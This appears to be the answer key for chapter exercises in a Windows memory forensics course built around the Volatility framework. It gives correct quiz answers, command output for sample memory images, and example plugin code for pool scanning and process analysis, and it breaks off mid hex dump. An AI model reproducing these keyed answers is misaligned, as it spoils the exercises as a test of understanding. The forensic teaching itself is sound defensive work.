---------------------------------------------------------------------- Chapter 1: Systems Overview ---------------------------------------------------------------------- 1. What component assists the CPU in address translation? A) The Memory Management Unit (MMU) B) The Address Translation Unit (ATU) C) The Central Memory Hub (CMH) D) The Memory Management Controller (MMC) The correct answer is: A 2. When dealing with raw, padded memory dumps, a physical address is an offset into the memory dump file. True or False? The correct answer is: True 3. Which statement(s) are false? A) IA32 architecture is also known as x86 B) Physical Address Extension (PAE) allows up to 64GB of physical memory C) 64-bit CPUs only actually use 52 bits of the available address space D) A typical page size is 4KB, but it can be larger if the page size entry (PSE) flag is set E) All of the above The correct answer is: C (they use 48 bits) 4. Which CPU register is used to store the directory table base (page directory base)? A) CR0 B) EAX C) CR3 D) DR3 The correct answer is: C 5. Which statement(s) are true? A) Paging allows processes to "see" more RAM than is physically present B) The page fault handler code must never be paged C) Paging complicates memory forensics because not all data is memory resident at the time of acquisition D) Paging writes potentially valuable volatile evidence to non-volatile storage such as disk E) All of the above The correct answer is: E 6. The winlogon.exe process (PID 628) in sample001.bin has a virtual address 0x77a80000 and DTB value 0x682e000. What is the corresponding physical offset? What do you see at the physical offset within the file? The correct answer is: 72159232 (an MZ header) $ python vol.py -f AMF_MemorySamples/windows/sample001.bin volshell Volatility Foundation Volatility Framework 2.4 (Beta) Current context: System @ 0x823c8830, pid=4, ppid=0 DTB=0x39000 Python 2.7.6 (v2.7.6:3a1db0d2747e, Nov 10 2013, 00:42:54) Type "copyright", "credits" or "license" for more information. IPython 2.0.0 -- An enhanced Interactive Python. ? -> Introduction and overview of IPython's features. %quickref -> Quick reference. help -> Python's own help system. object? -> Details about 'object', use 'object??' for extra details. In [1]: cc(pid = 628) Current context: winlogon.exe @ 0x82189da0, pid=628, ppid=356 DTB=0x682e000 In [2]: proc().get_process_address_space().vtop(0x77a80000) Out[2]: 72159232 In [3]: quit() $ xxd -s 72159232 AMF_MemorySamples/windows/sample001.bin | less 44d1000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ.............. 44d1010: b800 0000 0000 0000 4000 0000 0000 0000 ........@....... 44d1020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 44d1030: 0000 0000 0000 0000 0000 0000 f000 0000 ................ 44d1040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ........!..L.!Th 44d1050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno 44d1060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS 44d1070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode....$....... 44d1080: 1ac1 36e1 5ea0 58b2 5ea0 58b2 5ea0 58b2 ..6.^.X.^.X.^.X. ---------------------------------------------------------------------- Chapter 2: Data Structures ---------------------------------------------------------------------- 1. Which of the following data types consume 4 bytes on a 32-bit system? A) char B) unsigned int C) long D) pointer to an int E) pointer to a char The correct answer is: B, C, D, E 2. Which statement(s) are false about arrays? A) Elements can be found by multiplying the desired index by the size of an element and adding it to the array's base address B) Elements are contiguous in memory C) Elements must be of a single data type (homogenous) D) Arrays cannot store pointers The correct answer is: D 3. Which statements(s) are true about structures? A) Structures can store various different data types B) Structure sizes and member offsets can vary depending on compiler optimizations C) Operating systems and applications make heavy use of structures D) The names of structure members should indicate their purpose The correct answer is: A, B, C, D 4. Linked lists are easily manipulated by rootkits. True or False? The correct answer is: True 5. Performing memory forensics at the physical layer (i.e. without virtual address translation) limits analysis because: A) Strings that cross page boundaries may be fragmented in physical memory B) You cannot traverse linked lists C) Some hash tables and trees are never found in physical memory D) _UNICODE_STRING data types store metadata separately from the actual string content The correct answer is: A, B, D 6. Perform the following steps: A) Create a C source file with one or more data structures B) Initialize the structure members in the your main() function and print out their values C) Compile it with GCC or Microsoft Visual Studio Express D) Analyze the binary in a disassembler, or pause it in a debugger, and inspect the offsets for the structure members being passed to the print function E) Do your offsets match your expectations? The correct answer is: N/A ---------------------------------------------------------------------- Chapter 3: The Volatility Framework ---------------------------------------------------------------------- 1. Install Volatility and the dependency libraries (unless you're working with the standalone version). The correct answer is: N/A 2. Run the "vol.py --info" command. What profiles does your version support? The correct answer is: N/A 3. Run the "vol.py --help" command with and without a plugin name. How does the output differ? The correct answer is: You'll see the plugin-specific options 4. Run the kdbgscan plugin against a Windows memory sample. A) What profile does it suggest? B) What is the virtual address of the kernel debugger data structure? C) Were any inaccurate profiles suggested? Why or why not? The virtual address will be shown on the line with "Offset(V)" In some cases, you'll see slightly inaccurate profiles (for example Win7 SP1 versus Win7 SP0) because the OS data structures look similar. In these cases, look at the Service Pack value in the kdbgscan output to determine which suggestion is correct. 5. Using the profile you determined in step 4, list processes in your memory dump. Then run the same plugin again, but redirect output to a text file so you can save it for later analysis. The correct answer is: N/A 6. Perform the following steps: A) Copy exampleplugin.py into volatility/plugins B) Edit exampleplugin.py and change the name from ExamplePlugin to a name of your choice C) Edit the description of the plugin D) Edit the plugin to print the process ID (UniqueProcessId) in addition to the process name E) Run "vol.py --info" and see if your new plugin is registered F) Run your new plugin and observe the output G) Add a new method named render_csv (comma separated values) to the plugin and configure it to output data in CSV format H) Run the plugin with --output=csv and observe the output The correct answer is: (see below for an example) import volatility.utils as utils import volatility.commands as commands import volatility.win32.tasks as tasks class MyNewPlugin(commands.Command): """This is an example plugin that I modified""" def calculate(self): """This method performs the work""" addr_space = utils.load_as(self._config) for proc in tasks.pslist(addr_space): yield proc def render_text(self, outfd, data): """This method formats output to the terminal. :param outfd | data | """ for proc in data: outfd.write("Process: {0} PID {1}\n".format(proc.ImageFileName, proc.UniqueProcessId)) def render_csv(self, outfd, data): for proc in data: outfd.write("{0},{1}\n".format(proc.ImageFileName, proc.UniqueProcessId)) ---------------------------------------------------------------------- Chapter 4: Memory Acquisition ---------------------------------------------------------------------- 1. If a suspect computer is not powered on, you can attempt to recover memory in which of the following ways? A) page files on disk B) hibernation files C) old crash dumps D) introspection The correct answer is: A, B, C 2. Why is memory acquisition not a trivial task? What are some of the "gotchas" you need to watch out for? The correct answer is: cache coherency, device memory, anti-forensics, etc. 3. Which API is not commonly used by acquisition tools? A) MmCreateMemoryDump B) MmMapMemoryDumpMdl C) MmProbeAndLockPages D) ZwMapViewOfMemory E) MmMapIoSpace The correct answer is: A 4. It is important to run live response tools to gather evidence before acquiring physical memory, so that your memory capture contains the extra data generated by the live IR tools. True or False? The correct answer is: False (you should run live IR tools *after* acquiring physical memory, so you don't taint the evidence) 5. Perform the following steps: A) Dump memory from one of your machines to local USB/Firewire/ESATA B) Dump memory across the network (you can use a NAT or Host-only VM configuration). Make sure to use compression and encryption C) If possible, analyze memory using remote interrogation. Capture traffic while you run Volatility plugins. How much data is transferred with a basic process listing? The correct answer is: N/A 6. Perform the following steps: A) Analyze the registry of a target system to determine how many page files are in use B) Extract the page files from the running system (with TSK Windows binaries). C) Can Volatility analyze page files directly? Why or why not? D) Can you use Volatility's imagecopy plugin to convert a page file into a raw memory dump? Why or why not? E) Use page_brute to scan across your extracted page files. Does it find any hits? F) If necessary, extend page_brute's default Yara rules and scan your page files again. The correct answer is: Volatility cannot analyze page files directly at this time. You cannot use imagecopy to convert a page file into a raw memory dump (page file is just the "holes"). ---------------------------------------------------------------------- Chapter 5: Windows Objects and Pool Allocation ---------------------------------------------------------------------- 1. Run the objtypescan plugin against a memory dump from a system you own. A) How many different executive object types exist? B) Does the list of objects match what WinObj (Sysinternals) reports? C) What's the most highly used object type on your system? D) Which object types can be paged to disk? E) What is the 4-byte key (AKA tag) for process objects? The correct answer is: The number of executive object types differ per OS version, and the most highly used object type will differ per system. Here's an example: $ python ~/Desktop/GitHub/volatility/vol.py -f Win81x64-bf5ed93b.vmem --profile=Win8SP1x64 objtypescan Volatility Foundation Volatility Framework 2.4 (Beta) Offset nObjects nHandles Key Name PoolType ------------------ ------------------ ------------------ -------- ------------------------------ -------------------- 0x000000007cd65080 0x19 0x14 Dxgk DxgkSharedResource PagedPool 0x000000007cd65220 0x1 0x1 Dxgk DxgkSharedSyncObject PagedPool 0x000000007d00e890 0x5 0x5 Filt FilterCommunicationPort NonPagedPoolNx 0x000000007d04d4d0 0xf 0xf PcwO PcwObject PagedPool 0x000000007e465cf0 0x5 0x5 Filt FilterConnectionPort NonPagedPoolNx 0x000000007e4725f0 0x3e 0x197 Proc Process NonPagedPoolNx 0x000000007e472d70 0x0 0x0 Debu DebugObject NonPagedPoolNx 0x000000007e473420 0x0 0x0 User UserApcReserve NonPagedPoolNx 0x000000007e474610 0x18 0x0 Call Callback NonPagedPoolNx 0x000000007e475080 0x31 0xa0 Dire Directory PagedPool 0x000000007e476ce0 0x60d 0x1e5 Toke Token PagedPool 0x000000007e481740 0x1ace 0x1b9b Even Event NonPagedPoolNx 0x000000007e481c60 0x3 0x0 TmTx TmTx NonPagedPoolNx 0x000000007e481dc0 0x8 0x8 TmTm TmTm NonPagedPoolNx 0x000000007e481f20 0x1ca6 0x552 File File NonPagedPoolNx 0x000000007e4823f0 0x530 0x530 Wait WaitCompletionPacket NonPagedPoolNx 0x000000007e482550 0xc0 0xb6 IoCo IoCompletion NonPagedPoolNx 0x000000007e4826b0 0x7e 0x0 Driv Driver NonPagedPoolNx 0x000000007e485f20 0x2e 0x0 ObjT Type NonPagedPoolNx 0x000000007e487c50 0x0 0x0 Prof Profile NonPagedPoolNx 0x000000007e487db0 0x14d 0x14d IRTi IRTimer NonPagedPoolNx 0x000000007e48a590 0x0 0x0 IoCo IoCompletionReserve NonPagedPoolNx 0x000000007e48cc10 0x6 0x6d Wind WindowStation NonPagedPoolNx 0x000000007e48cd70 0x1 0x0 Keye KeyedEvent PagedPool 0x000000007e48d470 0x1c5 0x0 Devi Device NonPagedPoolNx 0x000000007e48d5d0 0x1 0x0 Cont Controller NonPagedPoolNx 0x000000007e48d730 0xb 0x0 Adap Adapter NonPagedPoolNx 0x000000007e48f830 0xa6 0xa6 TpWo TpWorkerFactory NonPagedPoolNx 0x000000007e48f990 0x25 0x29 Comp Composition NonPagedPoolNx 0x000000007e48faf0 0xa 0x3f Desk Desktop NonPagedPoolNx 0x000000007e490980 0x0 0x0 TmEn TmEn NonPagedPoolNx 0x000000007e490ae0 0x11 0x11 TmRm TmRm NonPagedPoolNx 0x000000007e492470 0x377 0x444 Thre Thread NonPagedPoolNx 0x000000007e497660 0xd0 0x5f Symb SymbolicLink PagedPool 0x000000007e497bb0 0x16 0x1b Job Job NonPagedPoolNx 0x000000007e4aceb0 0x191 0x228 Muta Mutant NonPagedPoolNx 0x000000007e544730 0x4a0 0x49a ALPC ALPC Port NonPagedPoolNx 0x000000007e546790 0x8c5 0x8d5 Key Key PagedPool 0x000000007e549080 0x705 0x325 Sect Section PagedPool 0x000000007e549730 0x2 0x10 Sess Session NonPagedPoolNx 0x000000007e54b8c0 0x5f 0x5f Time Timer NonPagedPoolNx 0x000000007e54ba20 0x559 0x564 Sema Semaphore NonPagedPoolNx 0x000000007e5512c0 0x5 0x2 Powe PowerRequest NonPagedPoolNx 0x000000007e552a30 0x14 0x13 WmiG WmiGuid NonPagedPoolNx 0x000000007e559a30 0x7 0x7 EtwC EtwConsumer NonPagedPoolNx 0x000000007e55aa30 0xf66 0xf66 EtwR EtwRegistration NonPagedPoolNx The list of objects shown by objtypescan should match WinObj. In the example output above, the most frequently used object type is File (file objects). Objects in the PagedPool can be paged. The tag/key for process objects is Proc. 2. Perform the following steps: A) Take two memory dumps - one before running allocator.exe and one after B) Use the pooltracker plugin to compare the changes it makes to the "Muta" pools C) If you integrate pooltag.txt into your pooltracker plugin output, what description does it provide for "Muta" objects? D) Run the mutantscan plugin. Does the output support the theories about allocator.exe's activity based on pool tag use statistics? Here's an example of the before and after status: $ python vol.py before.vmem --profile=Win7SP1x86 pooltracker -t Muta Volatility Foundation Volatility Framework 2.4 (Beta) Tag NpAllocs NpFrees NpBytes PgAllocs PgFrees PgBytes Driver Reason ------ -------- -------- -------- -------- -------- -------- -------------------- ------ Muta 655173 646431 908624 0 0 0 $ python vol.py after.vmem --profile=Win7SP1x86 pooltracker -t Muta Volatility Foundation Volatility Framework 2.4 (Beta) Tag NpAllocs NpFrees NpBytes PgAllocs PgFrees PgBytes Driver Reason ------ -------- -------- -------- -------- -------- -------- -------------------- ------ Muta 660764 646652 1424032 0 0 0 As you can see, there are approximately 5591 new mutex objects allocated. By integrating the pooltag.txt file, you'll see these objects are "Mutant objects": $ python vol.py after.vmem --profile=Win7SP1x86 pooltracker -t Muta --tagfile=~/Desktop/pooltag.txt Volatility Foundation Volatility Framework 2.4 (Beta) Tag NpAllocs NpFrees NpBytes PgAllocs PgFrees PgBytes Driver Reason ------ -------- -------- -------- -------- -------- -------- -------------------- ------ Muta 660764 646652 1424032 0 0 0 Mutant objects When running the mutantscan plugin, you'll see the new mutexes: $ python vol.py after.vmem --profile=Win7SP1x86 mutantscan Volatility Foundation Volatility Framework 2.4 (Beta) Offset(P) #Ptr #Hnd Signal Thread CID Name ------------------ -------- -------- ------ ---------- --------- ---- 0x0000000000184b70 2 1 0 0x864ed290 3820:824 Mutex6145 0x0000000000184bd0 2 1 0 0x864ed290 3820:824 Mutex6144 0x0000000000184c30 2 1 0 0x864ed290 3820:824 Mutex6143 0x0000000000935040 2 1 0 0x864ed290 3820:824 Mutex2976 0x00000000009350d8 2 1 0 0x864ed290 3820:824 Mutex2977 0x0000000000935cf8 2 1 0 0x864ed290 3820:824 Mutex7138 0x0000000000935d58 2 1 0 0x864ed290 3820:824 Mutex7137 0x0000000000935db8 2 1 0 0x864ed290 3820:824 Mutex7136 0x00000000009585b0 2 1 0 0x864ed290 3820:824 Mutex471 0x0000000000958808 2 1 0 0x864ed290 3820:824 Mutex3189 0x0000000000958868 2 1 0 0x864ed290 3820:824 Mutex3188 0x00000000009589b0 2 1 0 0x864ed290 3820:824 Mutex404 0x0000000000cee450 2 1 0 0x864ed290 3820:824 Mutex9685 0x0000000000cee4b0 2 1 0 0x864ed290 3820:824 Mutex9684 0x0000000000cee510 2 1 0 0x864ed290 3820:824 Mutex9683 0x0000000000cee570 2 1 0 0x864ed290 3820:824 Mutex9682 0x0000000000cee670 2 1 0 0x864ed290 3820:824 Mutex2693 0x0000000000cee6d0 2 1 0 0x864ed290 3820:824 Mutex2692 0x0000000000cee7c8 2 1 0 0x864ed290 3820:824 Mutex8029 0x0000000000cee828 2 1 0 0x864ed290 3820:824 Mutex8028 0x0000000000cee888 2 1 0 0x864ed290 3820:824 Mutex8027 0x0000000000cee8e8 2 1 0 0x864ed290 3820:824 Mutex8026 [snip] 3. The memory image sample002.bin is running a kernel driver that defines the following structure type. The driver allocates structures from nonpaged pools using tag 'RdeR'. Write a pool scanner to find these allocations and parse them. typedef struct _MMREDIR { int src_port; int dst_port; int redirect_port; char src_address[32]; char dst_address[32]; char redirect_address[32]; } MMREDIR, *PMMREDIR; Here's an example plugin: import volatility.plugins.common as common import volatility.utils as utils import volatility.poolscan as poolscan import volatility.obj as obj class RedirScanner(poolscan.SinglePoolScanner): checks = [ ('PoolTagCheck', dict(tag = 'RdeR')), ('CheckPoolType', dict(non_paged = True, paged = False)), ('CheckPoolSize', dict(condition = lambda x: x == 120)), ] class RedirTypes(obj.ProfileModification): def modification(self, profile): profile.vtypes.update({ '_MMREDIR': [ None, { 'src_port': [ 0, ['int']], 'dst_port': [ 4, ['int']], 'redirect_port': [ 8, ['int']], 'src_address': [ 12, ['String', dict(length = 32)]], 'dst_address': [ 44, ['String', dict(length = 32)]], 'redirect_address': [ 76, ['String', dict(length = 32)]], }]}) class RedirScan(common.AbstractWindowsCommand): """Scan for _MMREDIR structures allocated by RedirPro""" def calculate(self): ## Get a kernel address space kernel_space = utils.load_as(self._config) header_size = kernel_space.profile.get_obj_size("_POOL_HEADER") for offset in RedirScanner().scan(kernel_space): mmredir = obj.Object("_MMREDIR", offset = offset + header_size, vm = kernel_space) yield mmredir def render_text(self, outfd, data): self.table_header(outfd, [("Offset", "[addrpad]"), ("SrcPort", "8"), ("DstPort", "8"), ("RedirPort", "8"), ("SrcAddr", "20"), ("DstAddr", "20"), ("RedirAddr", "20"), ]) for mmredir in data: self.table_row(outfd, mmredir.obj_offset, mmredir.src_port, mmredir.dst_port, mmredir.redirect_port, mmredir.src_address, mmredir.dst_address, mmredir.redirect_address) The plugin's output should appear like this: $ python vol.py -f sample002.bin redirscan --profile=Win7SP1x86 Volatility Foundation Volatility Framework 2.4 (Beta) Offset SrcPort DstPort RedirPort SrcAddr DstAddr RedirAddr ---------- -------- -------- --------- -------------------- -------------------- -------------------- 0x85f336e8 0 80 8080 24.194.35.12 66.214.40.105 10.10.3.20 0x861f3008 0 0 0 0x86379200 0 0 0 0x863a2120 30021 443 22 any 66.214.40.105 192.168.172.42 0x864251f8 0 0 0 4. Run the pslist and psscan plugins against sample003.bin. A) Which process(es) are active? B) Which process(es) have terminated? C) Which process(es) are leftover from a previous reboot? All processes in the pslist output are active: $ python vol.py -f sample003.bin pslist Volatility Foundation Volatility Framework 2.4 (Beta) Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit ---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------ 0x819cc830 System 4 0 51 254 ------ 0 0x817e4670 smss.exe 360 4 3 19 ------ 0 2008-11-26 07:38:11 UTC+0000 0x8181bd78 csrss.exe 596 360 10 322 0 0 2008-11-26 07:38:13 UTC+0000 0x8182b100 winlogon.exe 620 360 16 503 0 0 2008-11-26 07:38:14 UTC+0000 0x8183ba78 services.exe 672 620 15 245 0 0 2008-11-26 07:38:15 UTC+0000 0x817dbc30 lsass.exe 684 620 21 347 0 0 2008-11-26 07:38:15 UTC+0000 0x81859d70 svchost.exe 844 672 19 198 0 0 2008-11-26 07:38:18 UTC+0000 0x8183d360 svchost.exe 932 672 10 229 0 0 2008-11-26 07:38:18 UTC+0000 0x818a2300 svchost.exe 1064 672 63 1308 0 0 2008-11-26 07:38:20 UTC+0000 0x817f7da0 svchost.exe 1164 672 5 77 0 0 2008-11-26 07:38:23 UTC+0000 0x8180e6f0 svchost.exe 1264 672 14 209 0 0 2008-11-26 07:38:25 UTC+0000 0x817ca478 explorer.exe 1516 1452 12 362 0 0 2008-11-26 07:38:27 UTC+0000 0x816e75e8 spoolsv.exe 1648 672 12 112 0 0 2008-11-26 07:38:28 UTC+0000 0x816af860 VMwareTray.exe 1896 1516 1 26 0 0 2008-11-26 07:38:31 UTC+0000 0x816af448 VMwareUser.exe 1904 1516 1 28 0 0 2008-11-26 07:38:31 UTC+0000 0x816a13c0 VMwareService.e 1756 672 3 45 0 0 2008-11-26 07:38:45 UTC+0000 0x816557e0 alg.exe 512 672 6 105 0 0 2008-11-26 07:38:53 UTC+0000 0x81643b28 wuauclt.exe 1372 1064 8 225 0 0 2008-11-26 07:39:38 UTC+0000 0x8164e3a8 wscntfy.exe 560 1064 1 31 0 0 2008-11-26 07:44:57 UTC+0000 According to the psscan output, only one process is terminated (cmd.exe pid 940) $ python vol.py -f sample003.bin psscan Volatility Foundation Volatility Framework 2.4 (Beta) Offset(P) Name PID PPID PDB Time created Time exited ------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------ 0x000000000181b748 alg.exe 992 660 0x08140260 2008-11-15 23:43:25 UTC+0000 0x0000000001843b28 wuauclt.exe 1372 1064 0x08140180 2008-11-26 07:39:38 UTC+0000 0x000000000184e3a8 wscntfy.exe 560 1064 0x081402a0 2008-11-26 07:44:57 UTC+0000 0x00000000018557e0 alg.exe 512 672 0x08140260 2008-11-26 07:38:53 UTC+0000 0x000000000185dda0 cmd.exe 940 1516 0x081401a0 2008-11-26 07:43:39 UTC+0000 2008-11-26 07:45:49 UTC+0000 0x00000000018a13c0 VMwareService.e 1756 672 0x08140220 2008-11-26 07:38:45 UTC+0000 0x00000000018af448 VMwareUser.exe 1904 1516 0x08140100 2008-11-26 07:38:31 UTC+0000 0x00000000018af860 VMwareTray.exe 1896 1516 0x08140200 2008-11-26 07:38:31 UTC+0000 0x00000000018e75e8 spoolsv.exe 1648 672 0x081401e0 2008-11-26 07:38:28 UTC+0000 0x00000000019456e8 csrss.exe 592 360 0x08140040 2008-11-15 23:42:56 UTC+0000 0x0000000001946020 svchost.exe 828 660 0x081400c0 2008-11-15 23:42:57 UTC+0000 0x00000000019467e0 services.exe 660 616 0x08140080 2008-11-15 23:42:56 UTC+0000 0x000000000194f658 svchost.exe 1016 660 0x08140100 2008-11-15 23:42:57 UTC+0000 0x00000000019533c8 svchost.exe 924 660 0x081400e0 2008-11-15 23:42:57 UTC+0000 0x00000000019ca478 explorer.exe 1516 1452 0x081401c0 2008-11-26 07:38:27 UTC+0000 0x00000000019dbc30 lsass.exe 684 620 0x081400a0 2008-11-26 07:38:15 UTC+0000 0x00000000019e4670 smss.exe 360 4 0x08140020 2008-11-26 07:38:11 UTC+0000 0x00000000019f7da0 svchost.exe 1164 672 0x08140140 2008-11-26 07:38:23 UTC+0000 0x0000000001a0e6f0 svchost.exe 1264 672 0x08140160 2008-11-26 07:38:25 UTC+0000 0x0000000001a1bd78 csrss.exe 596 360 0x08140040 2008-11-26 07:38:13 UTC+0000 0x0000000001a2b100 winlogon.exe 620 360 0x08140060 2008-11-26 07:38:14 UTC+0000 0x0000000001a3ba78 services.exe 672 620 0x08140080 2008-11-26 07:38:15 UTC+0000 0x0000000001a3d360 svchost.exe 932 672 0x081400e0 2008-11-26 07:38:18 UTC+0000 0x0000000001a59d70 svchost.exe 844 672 0x081400c0 2008-11-26 07:38:18 UTC+0000 0x0000000001aa2300 svchost.exe 1064 672 0x08140120 2008-11-26 07:38:20 UTC+0000 0x0000000001bcc830 System 4 0 0x00319000 All of the processes that started on 2008-11-15 are leftover from a previous reboot. 5. Which of the following is not a weakness of the pool tag scanning approach? A) It's possible to find false positives (decoys, fake objects, etc.) B) Pool tags can be manipulated because they're not essential to the OS C) Large allocations (> 4096 bytes) cannot be found with pool tag scanning D) Not all kernel allocations are tagged in the first place (i.e. ExAllocatePool) E) All of the above The correct answer is: E ---------------------------------------------------------------------- Chapter 6: Processes, Handles, and Tokens ---------------------------------------------------------------------- 1. Which of the following situations should have you worried? A) Two or more instances of svchost.exe are running B) The parent of winlogon.exe is services.exe C) csrss.exe is running from the "C:\Windows\system32" directory D) ssms.exe is running E) explorer.exe is running from the "C:\Windows\system32" directory The correct answer is: B, D, E 2. Run the psscan plugin on one of your memory images and generate a Graphviz diagram (--output=dot --output-file=graph.dot). Why doesn't explorer.exe have a parent? The correct answer is: Explorer's parent (userinit.exe) typically exits after starting explorer. 3. Run the psxview plugin against sample003.bin. A) Which process(es) are hidden? B) In what ways did the rootkit attempt to hide? $ python vol.py -f sample003.bin psxview --apply-rules Volatility Foundation Volatility Framework 2.4 (Beta) Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd ExitTime ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- -------- 0x01a2b100 winlogon.exe 620 True True True True True True True 0x01a3d360 svchost.exe 932 True True True True True True True 0x018a13c0 VMwareService.e 1756 True True True True True True True 0x018e75e8 spoolsv.exe 1648 True True True True True True True 0x019dbc30 lsass.exe 684 True True True True True True True 0x0184e3a8 wscntfy.exe 560 True True True True True True True 0x018af860 VMwareTray.exe 1896 True True True True True True True 0x01a4bc20 network_listene 1696 False False True True True True True 0x01843b28 wuauclt.exe 1372 True True True True True True True 0x01a59d70 svchost.exe 844 True True True True True True True 0x018af448 VMwareUser.exe 1904 True True True True True True True 0x019f7da0 svchost.exe 1164 True True True True True True True 0x018557e0 alg.exe 512 True True True True True True True 0x01a3ba78 services.exe 672 True True True True True True True 0x019ca478 explorer.exe 1516 True True True True True True True 0x01a0e6f0 svchost.exe 1264 True True True True True True True 0x01aa2300 svchost.exe 1064 True True True True True True True 0x019e4670 smss.exe 360 True True True True Okay Okay Okay 0x01bcc830 System 4 True True True True Okay Okay Okay 0x01a1bd78 csrss.exe 596 True True True True Okay True True 0x01946020 svchost.exe 828 False True False False False False False 0x019533c8 svchost.exe 924 False True True False False False False 0x0185dda0 cmd.exe 940 Okay True Okay Okay Okay Okay Okay 2008-11-26 07:45:49 UTC+0000 0x019467e0 services.exe 660 False True True False False False False 0x0181b748 alg.exe 992 False True True False False False False 0x0194f658 svchost.exe 1016 False True True False False False False 0x019456e8 csrss.exe 592 False True True False Okay False False The "network_listene" process is hidden from the plist and psscan plugins. It has been unlinked from PsActiveProcessHead and also values used by the pool scanner have been modified. 4. Run the getsids plugin against sample005.bin. A) How many users are logged on? B) What are their names? C) Is there any evidence of privilege escalation attacks? The correct answer is: One user is logged on with SID S-1-5-21-219294376-1976090562-3929857903-1112 (saadmin). Many processes, including cmd.exe and explorer.exe, have gained domain admin: explorer.exe (1928): S-1-5-21-219294376-1976090562-3929857903-1112 (saadmin) explorer.exe (1928): S-1-5-21-219294376-1976090562-3929857903-513 (Domain Users) explorer.exe (1928): S-1-1-0 (Everyone) explorer.exe (1928): S-1-5-32-545 (Users) explorer.exe (1928): S-1-5-32-544 (Administrators) explorer.exe (1928): S-1-5-4 (Interactive) explorer.exe (1928): S-1-5-11 (Authenticated Users) explorer.exe (1928): S-1-5-15 (This Organization) explorer.exe (1928): S-1-5-5-0-46433 (Logon Session) explorer.exe (1928): S-1-2-0 (Local (Users with the ability to log in locally)) explorer.exe (1928): S-1-5-21-219294376-1976090562-3929857903-512 (Domain Admins) 5. Run the privs plugin against sample004.bin and sample005.bin. A) In sample004.bin, which process(es) have the ability to load kernel drivers? B) In sample005.bin, the dfssvc.exe process (PID 1608) enabled SeRestorePrivilege and SeBackupPrivilege. Do you think that's something to be worried about? The correct answer is: $ python vol.py -f sample004.bin privs -r driver | grep Enabled Volatility Foundation Volatility Framework 2.4 (Beta) 624 winlogon.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 684 lsass.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1024 svchost.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1356 spoolsv.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1212 userinit.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1096 explorer.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 2008 reader_sl.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1796 AdobeARM.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1120 cmd.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers 1396 mdd.exe 10 SeLoadDriverPrivilege Present,Enabled Load and unload device drivers The fact that dfssvc.exe enabled SeRestorePrivilege and SeBackupPrivilege is not concerning, because dfssvc.exe is the Distributed File System Service process. 6. Which process is currently accessing the ")!VoqA.I4" mutex in sample004.bin? The correct answer is: pid 1096 ---------------------------------------------------------------------- Chapter 7: Processes Memory Internals ---------------------------------------------------------------------- 1. Run the processmemory.exe program on one of your virtual machines. Dump memory while it's running. What is the process ID of processmemory.exe in your memory dump? C:\> processmemory.exe Heap allocation: 1531c0 File mapping created at: 360000 In this case, the pid is 928: $ python vol.py -f XPSP3-8c391840.vmem pslist -n processmemory Volatility Foundation Volatility Framework 2.4 (Beta) Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit ---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------ 0x82226850 processmemory.e 928 1008 1 9 0 0 2014-07-12 17:58:07 UTC+0000 2. What data does it write to its heap? Use volshell to investigate. The correct answer is: "hello from the heap!" From the program's output, we know the heap address is 1531c0, so you can investigate like this: $ python vol.py -f XPSP3-8c391840.vmem volshell -p 928 Volatility Foundation Volatility Framework 2.4 (Beta) Current context: processmemory.e @ 0x82226850, pid=928, ppid=1008 DTB=0xa9401e0 Python 2.7.6 (v2.7.6:3a1db0d2747e, Nov 10 2013, 00:42:54) Type "copyright", "credits" or "license" for more information. IPython 2.0.0 -- An enhanced Interactive Python. ? -> Introduction and overview of IPython's features. %quickref -> Quick reference. help -> Python's own help system. object? -> Details about 'object', use 'object??' for extra details. In [1]: db(0x1531c0) 0x001531c0 68 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 68 hello.from.the.h 0x001531d0 65 61 70 21 00 00 00 00 00 00 00 00 00 00 00 00 eap!............ 0x001531e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x001531f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153200 c0 01 09 00 00 10 00 00 78 01 15 00 78 01 15 00 ........x...x... 0x00153210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3. Use the yarascan plugin to scan for the data you identified in Question 2. Does it show up in the expected location? It's found in two different locations: $ python vol.py -f XPSP3-8c391840.vmem yarascan -p 928 -Y "hello from the heap" Volatility Foundation Volatility Framework 2.4 (Beta) Rule: r1 Owner: Process processmemory.e Pid 928 0x0040a9b0 68 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 68 hello.from.the.h 0x0040a9c0 65 61 70 21 00 00 00 00 48 00 65 00 61 00 70 00 eap!....H.e.a.p. 0x0040a9d0 20 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 ..a.l.l.o.c.a.t. 0x0040a9e0 69 00 6f 00 6e 00 3a 00 20 00 25 00 78 00 0a 00 i.o.n.:...%.x... 0x0040a9f0 00 00 00 00 00 00 00 00 46 00 61 00 69 00 6c 00 ........F.a.i.l. 0x0040aa00 65 00 64 00 20 00 74 00 6f 00 20 00 61 00 6c 00 e.d...t.o...a.l. 0x0040aa10 6c 00 6f 00 63 00 61 00 74 